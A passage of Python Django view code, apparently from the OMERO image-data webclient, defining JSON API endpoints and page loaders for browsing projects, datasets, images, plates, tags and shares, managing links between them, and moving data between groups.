template = "webclient/data/containers.html"
elif menu == "usertags":
template = "webclient/data/containers.html"
else:
# E.g. search/search.html
template = "webclient/%s/%s.html" % (menu, menu)
# tree support
show = kwargs.get("show", Show(conn, request, menu))
# Constructor does no loading. Show.first_selected must be called first
# in order to set up our initial state correctly.
try:
first_sel = show.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
# We get the owner of the top level object, E.g. Project
# Actual api_paths_to_object() is retrieved by jsTree once loaded
initially_open_owner = show.initially_open_owner
# If we failed to find 'show'...
if request.GET.get("show", None) is not None and first_sel is None:
# and we're logged in as PUBLIC user...
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == conn.getUser().getOmeName()
):
# this is likely a regular user who needs to log in as themselves.
# Login then redirect to current url
return HttpResponseRedirect("%s?url=%s" % (reverse("weblogin"), url))
# need to be sure that tree will be correct omero.group
if first_sel is not None:
group_id = first_sel.details.group.id.val
if conn.isValidGroup(group_id):
switch_active_group(request, group_id)
else:
first_sel = None
# search support
init = {}
global_search_form = GlobalSearchForm(data=request.GET.copy())
if menu == "search":
if global_search_form.is_valid():
init["query"] = global_search_form.cleaned_data["search_query"]
# get url without request string - used to refresh page after switch
# user/group etc
url = kwargs.get("load_template_url", None)
if url is None:
url = reverse(viewname="load_template", args=[menu])
# validate experimenter is in the active group
active_group = request.session.get("active_group") or conn.getEventContext().groupId
# prepare members of group...
leaders, members = conn.getObject("ExperimenterGroup", active_group).groupSummary()
userIds = [u.id for u in leaders]
userIds.extend([u.id for u in members])
# check any change in experimenter...
user_id = request.GET.get("experimenter")
if initially_open_owner is not None:
if request.session.get("user_id", None) != -1:
# if we're not already showing 'All Members'...
user_id = initially_open_owner
try:
user_id = long(user_id)
except Exception:
user_id = None
# check if user_id is in a currnt group
if user_id is not None:
if (
user_id
not in (
set(map(lambda x: x.id, leaders)) | set(map(lambda x: x.id, members))
)
and user_id != -1
):
# All users in group is allowed
user_id = None
if user_id is None:
# ... or check that current user is valid in active group
user_id = request.session.get("user_id", None)
if user_id is None or int(user_id) not in userIds:
if user_id != -1: # All users in group is allowed
user_id = conn.getEventContext().userId
request.session["user_id"] = user_id
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
groups = myGroups
new_container_form = ContainerForm()
# colleagues required for search.html page only.
myColleagues = {}
if menu == "search":
for g in groups:
g.loadLeadersAndMembers()
for c in g.leaders + g.colleagues:
myColleagues[c.id] = c
myColleagues = list(myColleagues.values())
myColleagues.sort(key=lambda x: x.getLastName().lower())
context = {
"menu": menu,
"init": init,
"myGroups": myGroups,
"new_container_form": new_container_form,
"global_search_form": global_search_form,
}
context["groups"] = groups
context["myColleagues"] = myColleagues
context["active_group"] = conn.getObject("ExperimenterGroup", long(active_group))
context["active_user"] = conn.getObject("Experimenter", long(user_id))
context["initially_select"] = show.initially_select
context["initially_open"] = show.initially_open
context["isLeader"] = conn.isLeader()
context["current_url"] = url
context["page_size"] = settings.PAGE
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
context["current_admin_privileges"] = conn.getCurrentAdminPrivileges()
context["leader_of_groups"] = conn.getEventContext().leaderOfGroups
context["member_of_groups"] = conn.getEventContext().memberOfGroups
context["search_default_user"] = settings.SEARCH_DEFAULT_USER
context["search_default_group"] = settings.SEARCH_DEFAULT_GROUP
return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
return _load_template(request=request, menu=menu, conn=conn, url=url, **kwargs)
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
"""
Loads html content of the Groups/Users drop-down menu on main webclient
pages.
Url should be supplied in request, as target for redirect after switching
group.
"""
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
if conn.isAdmin(): # Admin can see all groups
system_groups = [
conn.getAdminService().getSecurityRoles().userGroupId,
conn.getAdminService().getSecurityRoles().guestGroupId,
]
groups = conn.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
groups = [g for g in groups if g.getId() not in system_groups]
groups.sort(key=lambda x: x.getName().lower())
else:
groups = myGroups
for g in groups:
g.loadLeadersAndMembers() # load leaders / members
context = {
"template": "webclient/base/includes/group_user_content.html",
"current_url": url,
"groups": groups,
"myGroups": myGroups,
}
return context
@login_required()
def api_group_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
member_id = get_long_or_default(request, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
# Get the groups
groups = tree.marshal_groups(
conn=conn, member_id=member_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": groups})
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
# Validate parameter
try:
experimenter_id = long(experimenter_id)
except ValueError:
return HttpResponseBadRequest("Invalid experimenter id")
try:
# Get the experimenter
if experimenter_id < 0:
experimenter = fake_experimenter(request)
else:
# Get the experimenter
experimenter = tree.marshal_experimenter(
conn=conn, experimenter_id=experimenter_id
)
if experimenter is None:
raise Http404("No Experimenter found with ID %s" % experimenter_id)
return JsonResponse({"experimenter": experimenter})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
experimenter_id = get_long_or_default(request, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# While this interface does support paging, it does so in a
# very odd way. The results per page is enforced per query so this
# will actually get the limit for projects, datasets (without
# parents), screens and plates (without parents). This is fine for
# the first page, but the second page may not be what is expected.
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
r = dict()
try:
# Get the projects
r["projects"] = tree.marshal_projects(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned datasets (without project parents)
r["datasets"] = tree.marshal_datasets(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the screens for the current user
r["screens"] = tree.marshal_screens(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned plates (without project parents)
r["plates"] = tree.marshal_plates(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned images container
try:
orph_t = request.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
orph_t = {"enabled": True}
if (
conn.isAdmin()
or conn.isLeader(gid=request.session.get("active_group"))
or experimenter_id == conn.getUserId()
or orph_t.get("enabled", True)
):
orphaned = tree.marshal_orphaned(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
orphaned["name"] = orph_t.get("name", "Orphaned Images")
r["orphaned"] = orphaned
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(r)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
project_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the datasets
datasets = tree.marshal_datasets(
conn=conn, project_id=project_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": datasets})
@login_required()
def api_image_list(request, conn=None, **kwargs):
"""Get a list of images
Specifiying dataset_id will return only images in that dataset
Specifying experimenter_id will return orpahned images for that
user
The orphaned images will include images which belong to the user
but are not in any dataset belonging to the user
Currently specifying both, experimenter_id will be ignored
"""
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
dataset_id = get_long_or_default(request, "id", None)
orphaned = get_bool_or_default(request, "orphaned", False)
load_pixels = get_bool_or_default(request, "sizeXYZ", False)
thumb_version = get_bool_or_default(request, "thumbVersion", False)
date = get_bool_or_default(request, "date", False)
experimenter_id = get_long_or_default(request, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
# Share ID is in kwargs from api/share_images/<id>/ which will create
# a share connection in @login_required.
# We don't support ?share_id in query string since this would allow a
# share connection to be created for ALL urls, instead of just this one.
share_id = "share_id" in kwargs and long(kwargs["share_id"]) or None
try:
# Get the images
images = tree.marshal_images(
conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
dataset_id=dataset_id,
share_id=share_id,
load_pixels=load_pixels,
group_id=group_id,
page=page,
date=date,
thumb_version=thumb_version,
limit=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": images})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
screen_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the plates
plates = tree.marshal_plates(
conn=conn, screen_id=screen_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": plates})
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
plate_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# Orphaned PlateAcquisitions are not possible so querying without a
# plate is an error
if plate_id is None:
return HttpResponseBadRequest("id (plate) must be specified")
try:
# Get the plate acquisitions
plate_acquisitions = tree.marshal_plate_acquisitions(
conn=conn, plate_id=plate_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": plate_acquisitions})
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
    """This is just used internally by api_link DELETE below.

    Returns None when no link needs removing, otherwise a tuple of
    (link_type_name, loaded link objects) joining the given children to
    a parent (filtered to `parent_id` when one is given, else all
    parents). Raises Http404 for an unsupported parent/child type
    combination, or when a specific parent was requested but no link
    exists.
    """
    if parent_type == "orphaned":
        return None
    link_type = None
    if parent_type == "experimenter":
        if child_type in ["dataset", "plate", "tag"]:
            # This will be a requested link if a dataset or plate is
            # moved from the de facto orphaned datasets/plates, it isn't
            # an error, but no link actually needs removing
            return None
    elif parent_type == "project":
        if child_type == "dataset":
            link_type = "ProjectDatasetLink"
    elif parent_type == "dataset":
        if child_type == "image":
            link_type = "DatasetImageLink"
    elif parent_type == "screen":
        if child_type == "plate":
            link_type = "ScreenPlateLink"
    elif parent_type == "tagset":
        if child_type == "tag":
            link_type = "AnnotationAnnotationLink"
    if not link_type:
        raise Http404("json data needs 'parent_type' and 'child_type'")
    params = omero.sys.ParametersI()
    params.addIds(child_ids)
    qs = conn.getQueryService()
    # Need to fetch child and parent, otherwise
    # AnnotationAnnotationLink is not loaded
    q = (
        """
        from %s olink join fetch olink.child join fetch olink.parent
        where olink.child.id in (:ids)
        """
        % link_type
    )
    # Only constrain by parent when one was requested; passing None
    # returns links to any parent (used to report remaining links).
    if parent_id:
        params.add("pid", rlong(parent_id))
        q += " and olink.parent.id = :pid"
    res = qs.findAllByQuery(q, params, conn.SERVICE_OPTS)
    if parent_id is not None and len(res) == 0:
        raise Http404(
            "No link found for %s-%s to %s-%s"
            % (parent_type, parent_id, child_type, child_ids)
        )
    return link_type, res
def create_link(parent_type, parent_id, child_type, child_id):
    """Build (but do not save) a parent-child link model object.

    This is just used internally by api_link POST.
    Returns the new link object, the string "orphan" when no link is
    needed (a dataset/plate moved to an experimenter becomes an
    orphan), or None for an unsupported parent/child combination.
    """
    if parent_type == "experimenter":
        if child_type in ("dataset", "plate"):
            # This is actually not a link that needs creating, this
            # dataset/plate is an orphan
            return "orphan"
    elif parent_type == "project" and child_type == "dataset":
        link = ProjectDatasetLinkI()
        link.setParent(ProjectI(long(parent_id), False))
        link.setChild(DatasetI(long(child_id), False))
        return link
    elif parent_type == "dataset" and child_type == "image":
        link = DatasetImageLinkI()
        link.setParent(DatasetI(long(parent_id), False))
        link.setChild(ImageI(long(child_id), False))
        return link
    elif parent_type == "screen" and child_type == "plate":
        link = ScreenPlateLinkI()
        link.setParent(ScreenI(long(parent_id), False))
        link.setChild(PlateI(long(child_id), False))
        return link
    elif parent_type == "tagset" and child_type == "tag":
        link = AnnotationAnnotationLinkI()
        link.setParent(TagAnnotationI(long(parent_id), False))
        link.setChild(TagAnnotationI(long(child_id), False))
        return link
    return None
def get_objects_owners(conn, child_type, child_ids):
    """Return a dict mapping each child object's id to its owner's id."""
    # Tags are looked up via their base Annotation type.
    lookup_type = "Annotation" if child_type == "tag" else child_type
    return {
        obj.id: obj.details.owner.id.val
        for obj in conn.getObjects(lookup_type, child_ids)
    }
@login_required()
def api_links(request, conn=None, **kwargs):
    """
    Entry point for the api_links methods.
    Dispatches to link creation (POST) or deletion (DELETE) depending
    on the request method; any other method gets a 405 response.
    """
    if request.method == "POST":
        handler = _api_links_POST
    elif request.method == "DELETE":
        handler = _api_links_DELETE
    else:
        return JsonResponse(
            {"Error": "Need to POST or DELETE JSON data to update links"}, status=405
        )
    # Parse the JSON request body.
    try:
        payload = json.loads(request.body)
    except TypeError:
        # for Python 3.5, where json.loads() rejects bytes
        payload = json.loads(bytes_to_native_str(request.body))
    return handler(conn, payload)
def _api_links_POST(conn, json_data, **kwargs):
    """Creates links between objects specified by a json
    blob in the request body.
    e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    When creating a link, fails silently if ValidationException
    (E.g. adding an image to a Dataset that already has that image).
    """
    response = {"success": False}
    # json is [parent_type][parent_id][child_type][childIds]
    # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    linksToSave = []
    # Admins with the WriteOwned privilege create links owned by the
    # child's owner rather than by themselves (see below).
    write_owned = "WriteOwned" in conn.getCurrentAdminPrivileges()
    user_id = conn.getUserId()
    for parent_type, parents in json_data.items():
        if parent_type in ("orphaned", "experimenter"):
            continue
        for parent_id, children in parents.items():
            for child_type, child_ids in children.items():
                # batch look-up owners of all child objects
                child_owners = get_objects_owners(conn, child_type, child_ids)
                for child_id in child_ids:
                    parent_id = int(parent_id)
                    link = create_link(parent_type, parent_id, child_type, child_id)
                    if link and link != "orphan":
                        # link owner should match child owner
                        if write_owned and child_owners[child_id] != user_id:
                            link.details.owner = ExperimenterI(
                                child_owners[child_id], False
                            )
                        linksToSave.append(link)
    # NOTE(review): parent_type/parent_id below are whatever the loops
    # above left them as (i.e. the *last* parent iterated) — the group
    # context is taken from that single parent, which assumes all links
    # in the payload live in one group. Confirm for multi-parent input.
    if len(linksToSave) > 0:
        # Need to set context to correct group (E.g parent group)
        ptype = parent_type.title()
        if ptype in ["Tagset", "Tag"]:
            ptype = "TagAnnotation"
        try:
            p = conn.getQueryService().get(ptype, parent_id, conn.SERVICE_OPTS)
            conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
        except omero.ValidationException:
            return JsonResponse(
                {"error": "Object of type %s and ID %s not found" % (ptype, parent_id)},
                status=404,
            )
        logger.info("api_link: Saving %s links" % len(linksToSave))
        try:
            # We try to save all at once, for speed.
            conn.saveArray(linksToSave)
            response["success"] = True
        except Exception:
            logger.info(
                "api_link: Exception on saveArray with %s links" % len(linksToSave)
            )
            # If this fails, e.g. ValidationException because link
            # already exists, try to save individual links
            for link in linksToSave:
                try:
                    conn.saveObject(link)
                except Exception:
                    pass
            response["success"] = True
    return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
    """Deletes links between objects specified by a json
    blob in the request body.
    e.g. {"dataset":{"10":{"image":[1,2,3]}}}

    The JSON response echoes the links that REMAIN to other parents
    (same nested format as the request) so the webclient can tell which
    children are now orphaned, plus a "success" flag.
    """
    response = {"success": False}
    # json is [parent_type][parent_id][child_type][childIds]
    # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    for parent_type, parents in json_data.items():
        if parent_type == "orphaned":
            continue
        for parent_id, children in parents.items():
            for child_type, child_ids in children.items():
                objLnks = get_object_links(
                    conn, parent_type, parent_id, child_type, child_ids
                )
                if objLnks is None:
                    continue
                linkType, links = objLnks
                linkIds = [r.id.val for r in links]
                logger.info("api_link: Deleting %s links" % len(linkIds))
                # NOTE(review): wait=True presumably blocks until the
                # server-side delete completes — confirm in gateway docs.
                conn.deleteObjects(linkType, linkIds, wait=True)
                # webclient needs to know what is orphaned
                linkType, remainingLinks = get_object_links(
                    conn, parent_type, None, child_type, child_ids
                )
                # return remaining links in same format as json above
                # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
                for rl in remainingLinks:
                    pid = rl.parent.id.val
                    cid = rl.child.id.val
                    # Deleting links still in progress above - ignore these
                    if pid == int(parent_id):
                        continue
                    if parent_type not in response:
                        response[parent_type] = {}
                    if pid not in response[parent_type]:
                        response[parent_type][pid] = {child_type: []}
                    response[parent_type][pid][child_type].append(cid)
    # If we got here, DELETE was OK
    response["success"] = True
    return JsonResponse(response)
@login_required()
def api_parent_links(request, conn=None, **kwargs):
    """
    Get a list of links as
    {'data': [{id: 12, child:{type:'image', id:1},
               parent:{type:'dataset', id:2}] }
    Supports ?image=1,2 and ?image=1&image=2
    """
    child_to_parent = {"image": "dataset", "dataset": "project", "plate": "screen"}
    data = []
    for ctype, ptype in child_to_parent.items():
        raw_ids = request.GET.getlist(ctype)
        if len(raw_ids) == 0:
            continue
        # flatten comma-separated values, e.g. ?image=1,2
        cids = [part for raw in raw_ids for part in raw.split(",")]
        link_type, links = get_object_links(conn, ptype, None, ctype, cids)
        for lnk in links:
            data.append(
                {
                    "id": lnk.id.val,
                    "parent": {"type": ptype, "id": lnk.parent.id.val},
                    "child": {"type": ctype, "id": lnk.child.id.val},
                }
            )
    return JsonResponse({"data": data})
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
    """
    This finds the paths to objects in the hierarchy. It returns only
    the path, not the object hierarchy itself.
    An example usage is for the 'show' functionality
    Example to go to the image with id 1 somewhere in the tree.
    http://localhost:8000/webclient/?show=image-1
    This method can tell the webclient exactly what needs to be
    dynamically loaded to display this in the jstree.
    """
    # Parse all the optional object-id parameters; each defaults to None
    # (or a sensible page size) when absent.
    try:
        experimenter_id = get_long_or_default(request, "experimenter", None)
        project_id = get_long_or_default(request, "project", None)
        dataset_id = get_long_or_default(request, "dataset", None)
        image_id = get_long_or_default(request, "image", None)
        screen_id = get_long_or_default(request, "screen", None)
        plate_id = get_long_or_default(request, "plate", None)
        acquisition_id = get_long_or_default(request, "run", None)
        # acquisition will override 'run' if both are specified as they are
        # the same thing
        acquisition_id = get_long_or_default(request, "acquisition", acquisition_id)
        # NOTE: unlike the other ids, 'well' is passed through as a raw
        # string rather than parsed as a long.
        well_id = request.GET.get("well", None)
        tag_id = get_long_or_default(request, "tag", None)
        tagset_id = get_long_or_default(request, "tagset", None)
        roi_id = get_long_or_default(request, "roi", None)
        shape_id = get_long_or_default(request, "shape", None)
        group_id = get_long_or_default(request, "group", None)
        page_size = get_long_or_default(request, "page_size", settings.PAGE)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # Tag/tagset paths are resolved separately from the container hierarchy.
    if tag_id is not None or tagset_id is not None:
        paths = paths_to_tag(conn, experimenter_id, tagset_id, tag_id)
    else:
        paths = paths_to_object(
            conn,
            experimenter_id,
            project_id,
            dataset_id,
            image_id,
            screen_id,
            plate_id,
            acquisition_id,
            well_id,
            group_id,
            page_size,
            roi_id,
            shape_id,
        )
    return JsonResponse({"paths": paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
    """Dispatch to the GET (list) or DELETE handler for tags."""
    handlers = {
        "GET": api_tags_and_tagged_list_GET,
        "DELETE": api_tags_and_tagged_list_DELETE,
    }
    handler = handlers.get(request.method)
    if handler is not None:
        return handler(request, conn, **kwargs)
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
    """Get a list of tags.

    Specifying tag_id will return any sub-tags, sub-tagsets and
    objects tagged with that id.
    If no tagset_id is specified it will return tags which have no
    parent.
    """
    # Get parameters
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        tag_id = get_long_or_default(request, "id", None)
        experimenter_id = get_long_or_default(request, "experimenter_id", -1)
        orphaned = get_bool_or_default(request, "orphaned", False)
        load_pixels = get_bool_or_default(request, "sizeXYZ", False)
        date = get_bool_or_default(request, "date", False)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        # Get ALL data (all owners) under specified tags
        if tag_id is not None:
            tagged = tree.marshal_tagged(
                conn=conn,
                experimenter_id=experimenter_id,
                tag_id=tag_id,
                group_id=group_id,
                page=page,
                load_pixels=load_pixels,
                date=date,
                limit=limit,
            )
        else:
            tagged = {}
        # Get 'tags' under tag_id
        tagged["tags"] = tree.marshal_tags(
            conn=conn,
            orphaned=orphaned,
            experimenter_id=experimenter_id,
            tag_id=tag_id,
            group_id=group_id,
            page=page,
            limit=limit,
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(tagged)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
    """Delete the listed tags by ids.

    Tag ids come from the ``id`` query parameter(s). All deletes are
    submitted to the server as a single DoAll command and awaited.
    Returns an empty JSON object on success, or an HTTP 4xx/5xx error.
    """
    # Get parameters
    try:
        tag_ids = get_longs(request, "id")
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    dcs = list()
    try:
        # One Delete command per tag, batched into a single DoAll.
        for tag_id in tag_ids:
            dcs.append(omero.cmd.Delete("/Annotation", tag_id))
        doall = omero.cmd.DoAll()
        doall.requests = dcs
        handle = conn.c.sf.submit(doall, conn.SERVICE_OPTS)
        try:
            conn._waitOnCmd(handle)
        finally:
            handle.close()
    except CmdError as e:
        return HttpResponseBadRequest(e.message)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    # Bug fix: JsonResponse("") raises TypeError, since Django requires
    # safe=False to serialize non-dict data. Return an empty object.
    return JsonResponse({})
@login_required()
def api_annotations(request, conn=None, **kwargs):
    """Marshal annotations (and their experimenters) for the requested
    objects as JSON: {"annotations": [...], "experimenters": [...]}.
    """
    params = request.GET
    anns, exps = tree.marshal_annotations(
        conn,
        project_ids=get_list(request, "project"),
        dataset_ids=get_list(request, "dataset"),
        image_ids=get_list(request, "image"),
        screen_ids=get_list(request, "screen"),
        plate_ids=get_list(request, "plate"),
        run_ids=get_list(request, "acquisition"),
        well_ids=get_list(request, "well"),
        ann_type=params.get("type", None),
        ns=params.get("ns", None),
        page=get_long_or_default(request, "page", 1),
        limit=get_long_or_default(request, "limit", ANNOTATIONS_LIMIT),
    )
    return JsonResponse({"annotations": anns, "experimenters": exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
    """Marshal shares and discussions for a member/owner as JSON."""
    # Get parameters
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        member_id = get_long_or_default(request, "member_id", -1)
        owner_id = get_long_or_default(request, "owner_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # Like with api_container_list, this is a combination of results:
    # each query may return up to `limit` results for the page.
    query_args = dict(
        conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
    )
    try:
        shares = tree.marshal_shares(**query_args)
        discussions = tree.marshal_discussions(**query_args)
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"shares": shares, "discussions": discussions})
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
    """
    This loads data for the center panel, via AJAX calls.
    Used for Datasets, Plates & Orphaned Images.
    Note: 'template' stays None unless a plate/acquisition is loaded.
    """
    # get index of the plate
    index = getIntOrDefault(request, "index", 0)
    # prepare data. E.g. kw = {} or {'plate': 301L} or
    # 'acquisition': 301L}
    kw = dict()
    if o1_type is not None:
        if o1_id is not None and int(o1_id) > 0:
            kw[str(o1_type)] = long(o1_id)
    try:
        manager = BaseContainer(conn, **kw)
    except AttributeError as x:
        return handlerInternalError(request, x)
    # prepare forms
    form_well_index = None
    context = {"manager": manager, "form_well_index": form_well_index, "index": index}
    # load data & template
    template = None
    if "plate" in kw or "acquisition" in kw:
        fields = manager.getNumberOfFields()
        if fields is not None:
            form_well_index = WellIndexForm(initial={"index": index, "range": fields})
            if index == 0:
                # default to the first available field index
                index = fields[0]
        # Show parameter will be well-1|well-2
        show = request.GET.get("show")
        if show is not None:
            wells_to_select = []
            for w in show.split("|"):
                if "well-" in w:
                    wells_to_select.append(w.replace("well-", ""))
            context["select_wells"] = ",".join(wells_to_select)
        context["baseurl"] = reverse("webgateway").rstrip("/")
        context["form_well_index"] = form_well_index
        context["index"] = index
        context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
        template = "webclient/data/plate.html"
        if o1_type == "acquisition":
            context["acquisition"] = o1_id
    context["isLeader"] = conn.isLeader()
    context["template"] = template
    return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
    """
    Get the potential groups we can move selected data to.
    These will be groups that the owner(s) of selected objects is a member of.
    Objects are specified by query string like: ?Image=1,2&Dataset=3
    If no selected objects are specified, simply list the groups that the
    current user is a member of.
    Groups list will exclude the 'current' group context.
    Returns {"owners": [[id, name], ...], "groups": [...]}.
    """
    ownerIds = []
    currentGroups = set()
    groupSets = []
    groups = {}
    owners = {}
    # Collect the owners and current groups of every selected object.
    for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
        oids = request.GET.get(dtype, None)
        if oids is not None:
            for o in conn.getObjects(dtype, oids.split(",")):
                ownerIds.append(o.getDetails().owner.id.val)
                currentGroups.add(o.getDetails().group.id.val)
    ownerIds = list(set(ownerIds))
    # In case we were passed no objects or they weren't found
    if len(ownerIds) == 0:
        ownerIds = [conn.getUserId()]
    # ownerIds is never empty (falls back to the current user above), so
    # groupSets below always has at least one set for the intersection.
    for owner in conn.getObjects(
        "Experimenter", ownerIds, opts={"load_experimentergroups": True}
    ):
        # Each owner has a set of groups
        gids = []
        owners[owner.id] = owner.getFullName()
        for group in owner.copyGroupExperimenterMap():
            groups[group.parent.id.val] = group.parent
            gids.append(group.parent.id.val)
        groupSets.append(set(gids))
    # Can move to groups that all owners are members of...
    targetGroupIds = set.intersection(*groupSets)
    # ...but not 'user' group
    userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
    if userGroupId in targetGroupIds:
        targetGroupIds.remove(userGroupId)
    # if all the Objects are in a single group, exclude it from the target
    # groups
    if len(currentGroups) == 1:
        curr_grp = currentGroups.pop()
        if curr_grp in targetGroupIds:
            targetGroupIds.remove(curr_grp)
    # Helper: summarize a group's permission flags for the JSON payload.
    def getPerms(group):
        p = group.getDetails().permissions
        return {
            "write": p.isGroupWrite(),
            "annotate": p.isGroupAnnotate(),
            "read": p.isGroupRead(),
        }
    # From groupIds, create a list of group dicts for json
    targetGroups = []
    for gid in targetGroupIds:
        targetGroups.append(
            {"id": gid, "name": groups[gid].name.val, "perms": getPerms(groups[gid])}
        )
    targetGroups.sort(key=lambda x: x["name"])
    owners = [[k, v] for k, v in owners.items()]
    return {"owners": owners, "groups": targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
    """Loads a tree for user to pick target Project, Dataset or Screen"""
    # Query within the requested group without switching the session group.
    conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
    owner_filter = getIntOrDefault(request, "owner", None)
    container = BaseContainer(conn)
    container.listContainerHierarchy(owner_filter)
    return {
        "manager": container,
        "target_type": target_type,
        "template": "webclient/data/chgrp_target_tree.html",
    }
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
    """
    Handles AJAX calls to search.
    With form=None simply renders the search home page; otherwise runs
